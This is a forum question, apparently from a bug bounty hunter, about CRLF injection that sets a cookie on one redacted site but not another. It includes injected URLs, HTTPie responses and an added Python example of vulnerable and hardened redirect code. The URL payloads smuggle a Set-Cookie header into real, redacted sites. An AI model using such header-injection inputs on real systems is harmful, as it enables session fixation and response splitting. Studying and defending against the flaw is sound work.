OK, I am facing very weird behaviour that both sets and doesn't set the cookie. So, first I found CRLF injection in two domains, redacted.de and redacted_another.com. When I go to the redacted_another.com vulnerable URL, the cookie gets set in firefox-esr. This works in the browser. The first vulnerable domain I encountered had this URL:
https://www.redacted_another.com/lp/%0ASet-Cookie:%20dipesh=yadav
I can view the cookies using the developer tools. This is the default behaviour, I think. The next domain I encountered had these vulnerable URLs, but they didn't work in the browser 🙁 :
http://www.redacted.de/forum/%0aSet-Cookie:%20dipesh=yadav
http://www.redacted.de/sso/registration/account/%3f%0d%0aSet-Cookie:%20dipesh=yadav
But when I visit any of these URLs from redacted.de, it doesn't work in the browser. Also, both redacted_another.com and redacted.de set the cookie in the curl response. This is what it looks like for both redacted domains, but the first one works in the browser and the second doesn't.
Working curl request:
root@kali-linux:~/redacted/# http https://www.redacted.com/lp/%0ASet-Cookie:%20dipesh=yadav
HTTP/2 301
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 185
location: https://www.redacted.com/lp/redirects/?olp=/lp/
set-cookie: dipesh=yadav
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800

HTTP/2 200
date: Thu, 13 Aug 2020 15:02:53 GMT
content-type: text/html
content-length: 1452
vary: Accept-Encoding
last-modified: Tue, 04 Feb 2020 15:54:26 GMT
etag: "redacted"
expires: Thu, 20 Aug 2020 15:02:53 GMT
cache-control: max-age=604800
access-control-allow-origin: *
accept-ranges: bytes
Not working curl request:
root@kali-linux:~/redacted# http http://www.redacted.de/sso/registration/account/%0aSet-Cookie:%20bugbounty=bugbountyplz
HTTP/1.1 301 Moved Permanently
Server: nginx
Date: Thu, 13 Aug 2020 15:05:04 GMT
Content-Type: text/html
Content-Length: 162
Location: https://www.redacted.de/sso/registration/account/
Set-Cookie: bugbounty=bugbountyplz
Last-Modified: Thu, 13 Aug 2020 15:05:04 GMT
Cache-Control: private
Age: 0
X-Frame-Options: DENY
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Connection: keep-alive

HTTP/2 200
server: nginx
date: Thu, 13 Aug 2020 15:05:05 GMT
content-type: text/html; charset=UTF-8
vary: Accept-Encoding
access-control-allow-credentials: true
access-control-allow-origin: https://www.redacted.de
last-modified: Thu, 13 Aug 2020 15:05:05 GMT
cache-control: no-cache, private
age: 0
strict-transport-security: max-age=15768000
x-frame-options: DENY
x-xss-protection: 1; mode=block
x-content-type-options: nosniff
accept-ranges: bytes
Can anyone help me with this? What's the problem that doesn't let me set the cookie in redacted.de, while I can set the cookie in redacted_another.com?
Author: Dipesh Sunrait
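The mechanism behind both responses above is the same: the server decodes the request path and copies it into the Location header of its 301, so a decoded CR/LF ends the Location value and the remainder is parsed by the client as a separate Set-Cookie header. The following Python is an added example written for this page, not code from the poster or from either site; the origin https://www.example.test, the path, and the function names are constructed placeholders. It builds the redirect both ways, parses the raw response the way a lenient HTTP/1.1 client would, and shows the check a defender would put in front of any header built from request data.

```python
"""Added example (not from the original post): why a redirect built from an
unvalidated request path splits into an extra Set-Cookie header, how a client
parses the result, and a hardened builder that prevents it."""
import re
from urllib.parse import quote, unquote

# Constructed sample input modelled on the post: an encoded CRLF in the path
# followed by a header line. The origin is a placeholder, not the real site.
ORIGIN = "https://www.example.test"
CLEAN_PATH = "/sso/registration/account/"
INJECTED_PATH = "/sso/registration/account/%0d%0aSet-Cookie:%20dipesh=yadav"

_CTL = re.compile(r"[\x00-\x1f\x7f]")


def safe_header_value(value: str) -> str:
    """Refuse any control character (CR, LF, NUL, ...) in a header value."""
    if _CTL.search(value):
        raise ValueError("control character in header value")
    return value


def _response(location: str) -> bytes:
    lines = [
        "HTTP/1.1 301 Moved Permanently",
        "Location: " + location,
        "Content-Length: 0",
    ]
    return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1")


def build_redirect_vulnerable(request_path: str) -> bytes:
    """The bug: decode the path and copy it into Location unchanged."""
    return _response(ORIGIN + unquote(request_path))


def build_redirect_hardened(request_path: str) -> bytes:
    """Re-encode the decoded path so CR/LF cannot survive into the header,
    then validate the finished value as a second line of defence."""
    target = ORIGIN + quote(unquote(request_path), safe="/?=&")
    return _response(safe_header_value(target))


def parse_headers(raw: bytes) -> dict:
    """Parse a raw response like a lenient HTTP/1.1 client: split the head on
    CRLF or bare LF and treat every 'Name: value' line as its own header."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in re.split(r"\r?\n", head)[1:]:
        name, sep, value = line.partition(":")
        if name and sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def injected_headers(raw: bytes,
                     expected=frozenset({"location", "content-length"})) -> set:
    """Detection check: header names a redirect should never carry."""
    return set(parse_headers(raw)) - set(expected)


if __name__ == "__main__":
    for builder in (build_redirect_vulnerable, build_redirect_hardened):
        raw = builder(INJECTED_PATH)
        print(builder.__name__, parse_headers(raw), injected_headers(raw))
```

With the vulnerable builder the parsed response carries a set-cookie header and a Location that stops at the injected newline, exactly as HTTPie showed above; with the hardened builder the CRLF is re-encoded as %0D%0A inside the Location value and no extra header appears. The same control-character check belongs on every header value derived from a request, not only Location.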